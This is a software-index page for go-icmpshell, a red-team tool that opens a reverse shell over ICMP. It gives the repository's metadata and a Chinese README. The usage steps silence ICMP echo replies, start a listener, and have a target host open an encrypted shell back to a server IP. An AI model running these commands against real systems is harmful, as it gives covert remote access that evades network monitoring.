Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/d1nfinite/go-icmpshell
一款基于 gopacket 编写的 ICMP 反弹 shell 工具
https://github.com/d1nfinite/go-icmpshell
golang gopacket icmp redteam redteam-tools reverse-shell
Last synced: 24 days ago
JSON representation
一款基于 gopacket 编写的 ICMP 反弹 shell 工具
- Host: GitHub
- URL: https://github.com/d1nfinite/go-icmpshell
- Owner: d1nfinite
- Created: 2022-04-30T13:08:34.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-05-05T12:58:24.000Z (over 2 years ago)
- Last Synced: 2024-10-16T06:44:54.757Z (about 1 month ago)
- Topics: golang, gopacket, icmp, redteam, redteam-tools, reverse-shell
- Language: Go
- Homepage:
- Size: 9.77 KB
- Stars: 152
- Watchers: 5
- Forks: 21
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# go-icmpshell
一款基于 `gopacket` 编写的 ICMP 反弹 shell 工具## Features
- 支持自定义 ICMP 通信 id
- 基于 `token` 进行协商认证
- 针对传输载荷进行有效加密## Usage
Server 端禁用 ICMP 自动 Reply
```shell
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
```Server 端启动监听
```shell
./server --token [secret]
```Shell 端通过 ICMP 反弹 Shell
```shell
./shell --token [secret] --ip [server_ip_address]
```